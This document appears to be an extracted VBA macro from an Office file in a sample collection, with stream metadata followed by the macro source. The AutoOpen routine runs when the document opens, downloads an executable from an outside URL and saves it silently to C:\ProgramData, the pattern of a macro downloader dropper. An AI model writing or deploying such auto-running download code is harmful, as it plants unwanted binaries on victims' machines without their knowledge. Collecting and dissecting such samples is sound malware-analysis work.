Filename     : ./macros/2376ca17896e0ad9aac0e019e56ef8fa016fa4f16fb0b92ed833b5a23c2c2a2c
OLE stream   : Macros/VBA/NewMacros
VBA filename : NewMacros.bas
----------------------------------------
Attribute VB_Name = "NewMacros"
Sub AutoOpen()

Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "https://dl.360safe.com/inst.exe", False
xHttp.Send

With bStrm
 .Type = 1 '
 .Open
 .write xHttp.responseBody
 .savetofile "C:\\ProgramData\\360360-41.exe", 2
End With


End Sub
